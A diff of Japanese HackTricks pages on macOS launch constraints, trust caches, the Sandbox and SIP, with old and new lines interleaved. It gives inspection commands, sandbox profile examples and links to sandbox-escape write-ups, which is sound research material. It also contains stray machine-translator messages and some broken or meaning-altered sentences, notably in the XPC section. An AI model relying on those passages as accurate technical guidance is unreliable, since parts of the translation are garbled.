これらは**サードパーティアプリケーション**で構成されたLaunch Constraintsです。開発者は、自分のアプリケーションへのアクセスを制限するために使用する**事実**と**論理演算子**を選択できます。
アプリケーションの環境制約を列挙することが可能です。
```bash
@ -78,19 +78,23 @@ codesign -d -vvvv app.app
```
## 信頼キャッシュ
**macOS**にはいくつかの信頼キャッシュがあります
**macOS** にはいくつかの信頼キャッシュがあります:
* **`/System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/BaseSystemTrustCache.img4`**
* **`/System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/StaticTrustCache.img4`**
* **`/System/Library/Security/OSLaunchPolicyData`**
- **`/System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/BaseSystemTrustCache.img4`**
- **`/System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/StaticTrustCache.img4`**
- **`/System/Library/Security/OSLaunchPolicyData`**
そして、iOSでは**`/usr/standalone/firmware/FUD/StaticTrustCache.img4`**にあるようです。
iOSでは、**`/usr/standalone/firmware/FUD/StaticTrustCache.img4`** にあるようです。
{% hint style="warning" %}
Apple Silicon デバイスで実行されている macOS では、Apple が署名したバイナリが信頼キャッシュに含まれていない場合、AMFI はそのバイナリの読み込みを拒否します。
{% endhint %}
### 信頼キャッシュの列挙
前述の信頼キャッシュファイルは、**IMG4**および**IM4P**形式です。IM4PはIMG4形式のペイロードセクションです。
前述の信頼キャッシュファイルは **IMG4** および **IM4P** 形式であり、IM4P は IMG4 形式のペイロードセクションです。
[**pyimg4**](https://github.com/m1stadev/PyIMG4)を使用してデータベースのペイロードを抽出できます
[**pyimg4**](https://github.com/m1stadev/PyIMG4) を使用してデータベースのペイロードを抽出できます:
{% code overflow="wrap" %}
```bash
@ -110,9 +114,9 @@ pyimg4 im4p extract -i /System/Library/Security/OSLaunchPolicyData -o /tmp/OSLau
```
{% endcode %}
(別のオプションとして、[**img4tool**](https://github.com/tihmstar/img4tool)というツールを使用することもできます。このツールは、リリースが古く、x86\_64向けのものであっても、M1でも実行されます。ただし、適切な場所にインストールする必要があります)。
(別のオプションとして、適切な場所にインストールすると、M1でもx86\_64用の古いリリースでも実行される[**img4tool**](https://github.com/tihmstar/img4tool)ツールを使用することもできます)。
これで、ツール[**trustcache**](https://github.com/CRKatri/trustcache)を使用して、情報を読みやすい形式で取得できます:
、ツール[**trustcache**](https://github.com/CRKatri/trustcache)を使用して、情報を読みやすい形式で取得できます:
```bash
# Install
wget https://github.com/CRKatri/trustcache/releases/download/v2.0/trustcache_macos_arm64
@ -136,7 +140,7 @@ entry count = 969
01e6934cb8833314ea29640c3f633d740fc187f2 [none] [2] [2]
020bf8c388deaef2740d98223f3d2238b08bab56 [none] [2] [3]
```
信頼キャッシュは以下の構造に従います。したがって、**LCカテゴリは4番目の列です**。
信頼キャッシュは次の構造に従いますので、**LCカテゴリは4番目の列です**。
```c
struct trust_cache_entry2 {
uint8_t cdhash[CS_CDHASH_LEN];
@ -146,25 +150,30 @@ uint8_t constraintCategory;
uint8_t reserved0;
} __attribute__((__packed__));
```
次に、[**このスクリプト**](https://gist.github.com/xpn/66dc3597acd48a4c31f5f77c3cc62f30)のようなものを使用してデータを抽出することができます。
そのデータから、**[こちらのスクリプト](https://gist.github.com/xpn/66dc3597acd48a4c31f5f77c3cc62f30)** を使用してデータを抽出できます。
そのデータから、**`0`の起動制約値を持つアプリ**をチェックできます。これは制約されていないアプリです(各値の詳細については[**こちら**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056)を参照)
そのデータを使用して、**`0`の起動制約値を持つアプリ**をチェックできます。これは制約されていないアプリです。各値の意味については、**[こちらを確認してください](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056)**
## 攻撃緩和
## 攻撃緩和
起動制約は、古い攻撃を緩和するためにいくつかの攻撃を防ぎます。例えば、予期しない場所からの実行や予期しない親プロセスによる呼び出しlaunchdだけが起動するはずの場合を防ぎます
起動制約は、**プロセスが予期しない状況で実行されないようにすることで**、いくつかの古い攻撃を緩和していました。たとえば、予期しない場所からの起動や予期しない親プロセスによる起動などですlaunchdだけが起動するはずの場合
さらに、起動制約はダウングレード攻撃も緩和します。
さらに、起動制約は**ダウングレード攻撃を緩和**します。
ただし、一般的なXPCの乱用、Electronのコードインジェクション、ライブラリの検証が行われていないdylibインジェクションライブラリをロードできるチームIDが既知の場合を除くは緩和されません。
ただし、これらは**一般的なXPCの悪用、Electronのコードインジェクション、ライブラリの検証なしでのdylibインジェクション**ライブラリを読み込むことができるチームIDがわかっている場合を除くを緩和しません。
### XPCデーモン保護
### XPCデーモン保護
この執筆時点Sonomaリリースでは、デーモンXPCサービスの**責任あるプロセスはXPCサービス自体**であり、接続するクライアントではありませんFB: FB13206884を提出。一瞬バグだと仮定しても、私たちは**攻撃者のコードでXPCサービスを起動することはできません**が、それが**既にアクティブ**である場合元のアプリによって呼び出された可能性があるため、接続することを防ぐものは何もありません。したがって、制約を設定することは良い考えかもしれませんし、攻撃の時間枠を制限することもできますが、それは主要な問題を解決するものではなく、私たちのXPCサービスは依然として接続するクライアントを適切に検証する必要があります。それが唯一のセキュリティ確保方法です。また、最初に述べたように、現在はこの方法では機能しません。
Sonomaリリースでは、デーモンXPCサービスの**責任構成**が注目されます。XPCサービスは自己責任であり、接続するクライアントが責任を負うのとは対照的です。これはフィードバックレポートFB13206884に記載されています。この設定は欠陥のように見えるかもしれませんが、次のようなXPCサービスとの相互作用を許可します
### Electronの保護
- **XPCサービスの起動**バグと仮定される場合、この設定では攻撃者のコードを介してXPCサービスを起動することは許可されません。
- **アクティブサービスへの接続**XPCサービスが既に実行中の場合おそらく元のアプリケーションによってアクティブ化された場合、接続に障壁はありません。
アプリケーションが**LaunchServiceによって開かれる必要がある**(親の制約で)。これは**`open`**を使用することで実現できます(環境変数を設定できます)または**Launch Services API**を使用することで実現できます(環境変数を指定できます)。
XPCサービスに制約を実装することで、**潜在的な攻撃の余地を狭める**ことができますが、これは主要な懸念には対処しません。XPCサービスのセキュリティを確保するには、**接続するクライアントを効果的に検証する**ことが不可欠です。これがサービスのセキュリティを強化する唯一の方法です。また、言及された責任構成が現在稼働していることに留意する価値がありますが、これは意図された設計と一致しない可能性があります。
### Electron保護
アプリケーションが**親の制約でLaunchServiceによって開かれる必要がある**場合でも、これは**`open`**(環境変数を設定できる)を使用するか、**Launch Services API**(環境変数を指定できる)を使用することで達成できます。
## 参考文献
@ -172,17 +181,3 @@ uint8_t reserved0;
* [https://theevilbit.github.io/posts/launch\_constraints\_deep\_dive/](https://theevilbit.github.io/posts/launch\_constraints\_deep\_dive/)
* [https://eclecticlight.co/2023/06/13/why-wont-a-system-app-or-command-tool-run-launch-constraints-and-trust-caches/](https://eclecticlight.co/2023/06/13/why-wont-a-system-app-or-command-tool-run-launch-constraints-and-trust-caches/)
* [https://developer.apple.com/videos/play/wwdc2023/10266/](https://developer.apple.com/videos/play/wwdc2023/10266/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけて、独占的な[NFT](https://opensea.io/collection/the-peass-family)のコレクションを発見してください。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
*
* .
</details>

108
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
View file

@ -1,35 +1,35 @@
# macOS Sandbox
# macOS サンドボックス
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有**してください。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
## 基本情報
macOS Sandbox初期にはSeatbeltと呼ばれていたは、アプリが実行されているSandboxプロファイルで指定された**許可されたアクションに**実行中のアプリケーションを**制限します**。これにより、**アプリケーションが予想されるリソースのみにアクセスすることを保証するのに役立ちます**
MacOS サンドボックス(最初は Seatbelt と呼ばれていました)は、**アプリケーションがサンドボックス内で実行される際に許可されたアクション**に制限をかけます。これにより、**アプリケーションが予期されたリソースにのみアクセスすることが保証**されます
**`com.apple.security.app-sandbox`** の**権限**を持つアプリは、サンドボックス内で実行されます。**Appleのバイナリ**は通常、Sandbox内で実行され、**App Store**内で公開するためには、**この権限が必須です**。したがって、ほとんどのアプリケーションはサンドボックス内で実行されます。
**`com.apple.security.app-sandbox`** **権限**を持つアプリは、サンドボックス内で実行されます。**Apple バイナリ**は通常、サンドボックス内で実行され、**App Store**公開するためには、**この権限が必須**です。したがって、ほとんどのアプリケーションはサンドボックス内で実行されます。
プロセスができること、できないことを制御するために、**Sandboxにはカーネル全体のすべてのシステムコールにフックがあります**。アプリの**権限**に**依存して**、Sandboxは特定のアクションを**許可します**
プロセスが何ができるかできないかを制御するために、**サンドボックスには** カーネル全体の **すべてのシスコールにフックがあります。**アプリの**権限**に応じて、サンドボックスは**特定のアクションを許可**します
Sandboxの重要なコンポーネントには以下が含まれます:
サンドボックスの重要なコンポーネントには次のものがあります:
* **カーネル拡張** `/System/Library/Extensions/Sandbox.kext`
* **プライベートフレームワーク** `/System/Library/PrivateFrameworks/AppSandbox.framework`
* ユーザーランドで実行される**デーモン** `/usr/libexec/sandboxd`
* **コンテナ** `~/Library/Containers`
コンテナフォルダ内には、バンドルIDの名前で**サンドボックスで実行された各アプリのフォルダが見つかります**
コンテナフォルダ内には、**バンドルIDの名前で実行された各アプリ用のフォルダ**があります:
```bash
ls -l ~/Library/Containers
total 0
@ -40,7 +40,7 @@ drwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings
drwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler
[...]
```
各バンドルIDフォルダ内には、アプリの**plist**と**Dataディレクトリ**が含まれています:
各バンドルIDフォルダの中には、Appの**plist**と**Dataディレクトリ**が含まれています:
```bash
cd /Users/username/Library/Containers/com.apple.Safari
ls -la
@ -64,7 +64,7 @@ drwx------ 2 username staff 64 Mar 24 18:02 SystemData
drwx------ 2 username staff 64 Mar 24 18:02 tmp
```
{% hint style="danger" %}
サンドボックスから「脱出」して他のフォルダにアクセスするためのシンボリックリンクがあっても、アプリはそれらにアクセスするための**権限を持っている必要があります**。これらの権限は**`.plist`**内にあります。
シンボリックリンクがあっても、サンドボックスから「脱出」して他のフォルダにアクセスするためには、アプリがそれらにアクセスする**権限を持っている**必要があります。これらの権限は**`.plist`**内にあります。
{% endhint %}
```bash
# Get permissions
@ -114,14 +114,14 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
[...]
```
{% hint style="warning" %}
Sandboxedアプリケーションによって作成/変更されたものは、**隔離属性**を取得します。これにより、Sandboxアプリが**`open`**を使用して何かを実行しようとした場合にGatekeeperをトリガーすることによって、sandbox空間が保護されます。
Sandboxアプリケーションによって作成/変更されたすべてのものには、**quarantine属性**が付与されます。これにより、Sandboxアプリケーションが**`open`**を使用して何かを実行しようとすると、GatekeeperがトリガーされてSandboxスペースが防がれます。
{% endhint %}
### サンドボックスプロファイル
### Sandboxプロファイル
サンドボックスプロファイルは、その**サンドボックス**で**許可/禁止**されることを示す設定ファイルです。**Sandbox Profile Language (SBPL)**を使用し、[**Scheme**](https://en.wikipedia.org/wiki/Scheme\_\(programming\_language\))プログラミング言語を使用します。
Sandboxプロファイルは、そのSandboxで何が**許可/禁止**されるかを示す構成ファイルです。これは**Sandbox Profile Language (SBPL)**を使用し、[**Scheme**](https://en.wikipedia.org/wiki/Scheme\_\(programming\_language\))プログラミング言語を使用しています。
以下に例を示します:
ここでは、例を見つけることができます:
```scheme
(version 1) ; First you get the version
@ -140,34 +140,34 @@ Sandboxedアプリケーションによって作成/変更されたものは、*
)
```
{% hint style="success" %}
この[**研究**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/)をチェックして、許可されるか拒否されるかもしれないアクションをもっと確認してください。
[**こちらの研究**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **をチェックして、許可または拒否される可能性のあるさらなるアクションを確認してください。**
{% endhint %}
重要な**システムサービス**も独自のカスタム**サンドボックス**内で実行されます。例えば`mdnsresponder`サービスです。これらのカスタム**サンドボックスプロファイル**は以下で確認できます:
重要な**システムサービス**も独自の**sandbox**内で実行されます。例えば、`mdnsresponder`サービスがあります。これらの独自の**sandboxプロファイル**は以下で確認できます:
* **`/usr/share/sandbox`**
* **`/System/Library/Sandbox/Profiles`**&#x20;
* 他のサンドボックスプロファイルは[https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles)で確認できます。
* 他のsandboxプロファイルは[https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles)で確認できます。
**App Store**アプリは**プロファイル** **`/System/Library/Sandbox/Profiles/application.sb`**を使用します。このプロファイルで、**`com.apple.security.network.server`**のような権限がプロセスにネットワークの使用を許可する方法を確認できます。
**App Store**アプリは**プロファイル** **`/System/Library/Sandbox/Profiles/application.sb`**を使用します。このプロファイルで、**`com.apple.security.network.server`**などの権限がプロセスがネットワークを使用することを許可する方法を確認できます。
SIPは/System/Library/Sandbox/rootless.conf内のplatform_profileというサンドボックスプロファイルです。
SIPは/System/Library/Sandbox/rootless.confにあるplatform\_profileというSandboxプロファイルです。
### サンドボックスプロファイルの例
### Sandboxプロファイルの例
特定のサンドボックスプロファイルでアプリケーションを開始するには、次のコマンドを使用できます:
**特定のsandboxプロファイル**でアプリケーションを起動するには、以下を使用できます:
```bash
sandbox-exec -f example.sb /Path/To/The/Application
```
{% tabs %}
{% tab title="タッチ" %}
{% tab title="touch" %}
{% code title="touch.sb" %}
```scheme
(version 1)
(deny default)
(allow file* (literal "/tmp/hacktricks.txt"))
```
Since there is no English text provided that requires translation, I cannot proceed with a translation task. Please provide the relevant English text that you would like to be translated into Japanese.
{% endcode %}
```bash
# This will fail because default is denied, so it cannot execute touch
sandbox-exec -f touch.sb touch /tmp/hacktricks.txt
@ -180,7 +180,7 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
2023-05-26 13:42:52.701382+0200 localhost kernel[0]: (Sandbox) 5 duplicate reports for Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /var
[...]
```
Since the provided text does not contain any English content to translate, there is nothing to translate. The markdown syntax provided is for a code block with a title, which does not require translation as per the instructions. If you have any specific English text that needs to be translated into Japanese, please provide the text.
{% code title="touch2.sb" %}
```scheme
(version 1)
(deny default)
@ -194,11 +194,9 @@ Since the provided text does not contain any English content to translate, there
; 2023-05-26 13:44:59.840050+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) sysctl-read kern.bootargs
; 2023-05-26 13:44:59.840061+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /
```
```
{% endcode %}
{% code title="touch3.sb" %}
```
```scheme
(version 1)
(deny default)
@ -212,50 +210,50 @@ Since the provided text does not contain any English content to translate, there
{% endtabs %}
{% hint style="info" %}
**Windows**で動作する**Apple製のソフトウェア**には、アプリケーションのサンドボックス化などの追加のセキュリティ対策が**ない**ことに注意してください
**Windows**上で実行される**Apple製のソフトウェア**には、アプリケーションのサンドボックス化などの追加のセキュリティ対策がありません
{% endhint %}
バイパス例:
バイパスの例:
* [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
* [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (サンドボックスの外に`~$`で始まる名前のファイルを書き込むことができます)
- [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c)(サンドボックス外に`~$`で始まる名前のファイルを書き込むことができます)
### MacOS サンドボックス プロファイル
### MacOSサンドボックスプロファイル
macOSはシステムのサンドボックスプロファイルを**/usr/share/sandbox/****/System/Library/Sandbox/Profiles** の二箇所に保存しています。
macOSはシステムのサンドボックスプロファイルを**/usr/share/sandbox/**と**/System/Library/Sandbox/Profiles**の2つの場所に保存しています。
そして、サードパーティのアプリケーションが _**com.apple.security.app-sandbox**_ 権限を持っている場合、システムはそのプロセスに **/System/Library/Sandbox/Profiles/application.sb** プロファイルを適用します。
また、サードパーティ製のアプリケーションが _**com.apple.security.app-sandbox**_ 権限を持っている場合、システムはそのプロセスに**/System/Library/Sandbox/Profiles/application.sb**プロファイルを適用します。
### **iOS サンドボックス プロファイル**
### **iOSサンドボックスプロファイル**
デフォルトのプロファイルは **container** と呼ばれ、SBPLテキスト表現はありません。メモリ内では、このサンドボックスはサンドボックスの各権限に対する許可/拒否のバイナリツリーとして表されます。
デフォルトのプロファイルは**container**と呼ばれ、SBPLテキスト表現はありません。メモリ上では、このサンドボックスは、サンドボックスの各権限に対してAllow/Denyバイナリツリーとして表現されます。
### サンドボックスのデバッグとバイパス
**macOSではプロセスはサンドボックス化されて生まれませんiOSとは異なり**、iOSではカーネルによってプログラムの最初の命令が実行される前にサンドボックスが適用されますが、macOSでは**プロセスは自らサンドボックスに入ることを選択する必要があります。**
macOSでは、iOSとは異なり、プロセスはカーネルによって最初からサンドボックス化されるわけではありません。つまり、macOSでは、プロセスは自らサンドボックスに入ることを積極的に決定するまで、サンドボックスによって制限されません。
プロセスは、権限 `com.apple.security.app-sandbox` を持っている場合、ユーザーランドから自動的にサンドボックス化されて起動します。このプロセスの詳細な説明については、以下をチェックしてください:
プロセスは、`com.apple.security.app-sandbox`権限を持っている場合、起動時にユーザーランドから自動的にサンドボックス化されます。このプロセスの詳細な説明については、次を確認してください:
{% content-ref url="macos-sandbox-debug-and-bypass/" %}
[macos-sandbox-debug-and-bypass](macos-sandbox-debug-and-bypass/)
{% endcontent-ref %}
### **PID 権限の確認**
### **PID権限の確認**
[**これによると**](https://www.youtube.com/watch?v=mG715HcDgO8\&t=3011s)、**`sandbox_check`** (これは `__mac_syscall` です)は、特定のPIDでサンドボックスによって操作が許可されているかどうかをチェックすることができます。
[**これによると**](https://www.youtube.com/watch?v=mG715HcDgO8\&t=3011s)、**`sandbox_check`**`__mac_syscall`ですは、特定のPIDでサンドボックスによって操作が許可されているかどうかを確認できます。
[**ツール sbtool**](http://newosxbook.com/src.jl?tree=listings\&file=sbtool.c)は、PIDが特定のアクションを実行できるかどうかをチェックすることができます:
[**ツールsbtool**](http://newosxbook.com/src.jl?tree=listings\&file=sbtool.c)は、PIDが特定のアクションを実行できるかどうかを確認できます。
```bash
sbtool <pid> mach #Check mac-ports (got from launchd with an api)
sbtool <pid> file /tmp #Check file access
sbtool <pid> inspect #Gives you an explaination of the sandbox profile
sbtool <pid> all
```
### App StoreアプリのカスタムSBPL
### App StoreアプリのカスタムSBPL
企業がデフォルトのものではなく、**カスタムサンドボックスプロファイル**でアプリを実行することが可能です。そのためには、Appleによって承認される必要がある権限 **`com.apple.security.temporary-exception.sbpl`** を使用する必要があります。
企業がアプリを**デフォルトではなくカスタムサンドボックスプロファイル**で実行することが可能です。Appleによって承認される必要がある権限**`com.apple.security.temporary-exception.sbpl`**を使用する必要があります。
この権限の定義**`/System/Library/Sandbox/Profiles/application.sb:`** で確認できます。
この権限の定義を**`/System/Library/Sandbox/Profiles/application.sb:`**で確認することが可能です。
```scheme
(sandbox-array-entitlement
"com.apple.security.temporary-exception.sbpl"
@ -263,18 +261,18 @@ sbtool <pid> all
(let* ((port (open-input-string string)) (sbpl (read port)))
(with-transparent-redirection (eval sbpl)))))
```
の権限の後の文字列を**Sandboxプロファイルとして評価します**
れは**この権限の後に文字列を評価**してSandboxプロファイルとして扱います
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでのAWSハッキングを学ぶ</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **ハッキングテクニックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>

167
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
View file

@ -2,200 +2,189 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけ
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングテクニックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに。
</details>
## **基本情報**
**System Integrity Protection (SIP)** はmacOSのセキュリティ技術で、rootユーザーであっても、特定のシステムディレクトリへの不正アクセスから保護します。これにより、ファイルの作成、変更、削除を含むこれらのディレクトリへの変更が防止されます。SIPが保護する主なディレクトリは以下の通りです:
macOS の **System Integrity Protection (SIP)** は、最も特権のあるユーザーでさえ、主要なシステムフォルダーに対して未承認の変更を行うことを防ぐよう設計されたメカニズムです。この機能は、保護された領域でのファイルの追加、変更、削除などのアクションを制限することで、システムの整合性を維持する上で重要な役割を果たします。SIP によって保護される主要なフォルダーには以下が含まれます:
* **/System**
* **/bin**
* **/sbin**
* **/usr**
これらのディレクトリとそのサブディレクトリの保護ルールは、**`/System/Library/Sandbox/rootless.conf`** ファイルで指定されています。このファイル内で、アスタリスク(\*)で始まるパスはSIPの制限からの例外を表します。
SIP の動作を規定するルールは、**`/System/Library/Sandbox/rootless.conf`** にある構成ファイルで定義されています。このファイル内では、アスタリスク (*) で始まるパスは、通常の厳格なSIP制限の例外として示されています。
例えば、以下の設定:
以下は例です:
```javascript
/usr
* /usr/libexec/cups
* /usr/local
* /usr/share/man
```
**`/usr`** ディレクトリは一般的にSIPによって保護されています。ただし、指定された3つのサブディレクトリ`/usr/libexec/cups`、`/usr/local`、`/usr/share/man`)については、先頭にアスタリスク(\*)が付いているため、変更が許可されています。
このスニペットは、SIPが一般的に**`/usr`**ディレクトリを保護する一方で、特定のサブディレクトリ(`/usr/libexec/cups`、`/usr/local`、および`/usr/share/man`)では、そのパスの前にアスタリスク(*)が付いているため、変更が許可されていることを示しています。
ディレクトリやファイルがSIPによって保護されているかどうかを確認するには、**`ls -lOd`** コマンドを使用して、**`restricted`** または **`sunlnk`** フラグの存在をチェックできます。例えば
ディレクトリやファイルがSIPによって保護されているかどうかを確認するには、**`ls -lOd`**コマンドを使用して、**`restricted`**または**`sunlnk`**フラグの存在を確認できます。例
```bash
ls -lOd /usr/libexec/cups
drwxr-xr-x 11 root wheel sunlnk 352 May 13 00:29 /usr/libexec/cups
```
この場合、**`sunlnk`** フラグは `/usr/libexec/cups` ディレクトリ自体が**削除できない**ことを意味していますが、その中のファイルは作成、変更、または削除することができます。
この場合、**`sunlnk`** フラグは、`/usr/libexec/cups` ディレクトリそのものは**削除できない**ことを示していますが、その中のファイルは作成、変更、削除ができます。
一方で:
一方
```bash
ls -lOd /usr/libexec
